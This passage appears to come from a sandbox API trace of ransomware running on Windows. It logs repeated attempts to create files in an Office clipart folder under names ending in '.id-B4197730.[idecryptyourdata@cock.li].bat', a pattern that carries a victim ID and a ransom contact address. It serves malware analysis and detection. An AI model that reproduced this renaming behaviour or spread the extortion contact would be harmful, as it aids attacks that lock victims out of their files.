Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186362.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.036] CloseHandle (hObject=0x52c) returned 1 [0164.036] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.037] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186364.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.037] CloseHandle (hObject=0x52c) returned 1 [0164.037] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.038] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187647.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.038] CloseHandle (hObject=0x52c) returned 1 [0164.039] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.039] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187815.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.040] CloseHandle (hObject=0x52c) returned 1 [0164.040] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.040] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187817.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.041] CloseHandle (hObject=0x52c) returned 1 [0164.041] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.042] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187819.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.042] CloseHandle (hObject=0x52c) returned 1 [0164.043] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.043] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187825.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.043] CloseHandle (hObject=0x52c) returned 1 [0164.044] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.044] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187829.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.044] CloseHandle (hObject=0x52c) returned 1 [0164.045] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.045] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187835.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.045] CloseHandle (hObject=0x52c) returned 1 [0164.046] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.046] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187837.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.047] CloseHandle (hObject=0x52c) returned 1 [0164.047] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.047] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187839.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.048] CloseHandle (hObject=0x52c) returned 1 [0164.048] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.048] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187847.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.049] CloseHandle (hObject=0x52c) returned 1 [0164.049] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.050] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187849.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.050] CloseHandle (hObject=0x52c) returned 1 [0164.052] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.052] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187851.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.053] CloseHandle (hObject=0x52c) returned 1 [0164.054] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.057] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187859.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.058] CloseHandle (hObject=0x52c) returned 1 [0164.058] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.059] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187861.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.059] CloseHandle (hObject=0x52c) returned 1 [0164.059] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.060] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187863.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.060] CloseHandle (hObject=0x52c) returned 1 [0164.061] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.061] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187881.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.061] CloseHandle (hObject=0x52c) returned 1 [0164.062] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.062] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187883.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.062] CloseHandle (hObject=0x52c) returned 1 [0164.775] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.776] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187893.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.776] CloseHandle (hObject=0x514) returned 1 [0164.777] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.777] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198020.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.777] CloseHandle (hObject=0x514) returned 1 [0164.778] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.778] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198021.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.778] CloseHandle (hObject=0x514) returned 1 [0164.779] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.779] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198022.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.779] CloseHandle (hObject=0x514) returned 1 [0164.780] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.780] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198025.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.781] CloseHandle (hObject=0x514) returned 1 [0164.782] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.782] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198102.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.782] CloseHandle (hObject=0x514) returned 1 [0164.784] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.784] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198113.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.784] CloseHandle (hObject=0x514) returned 1 [0164.785] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.785] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198226.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.785] CloseHandle (hObject=0x514) returned 1 [0164.786] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.786] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198234.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.786] CloseHandle (hObject=0x514) returned 1 [0164.787] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.787] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198372.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.787] CloseHandle (hObject=0x514) returned 1 [0164.789] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.789] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198377.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.789] CloseHandle (hObject=0x514) returned 1 [0164.790] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.790] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198447.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.790] CloseHandle (hObject=0x514) returned 1 [0164.791] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.791] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198494.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.791] CloseHandle (hObject=0x514) returned 1 [0164.792] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.792] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198712.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), 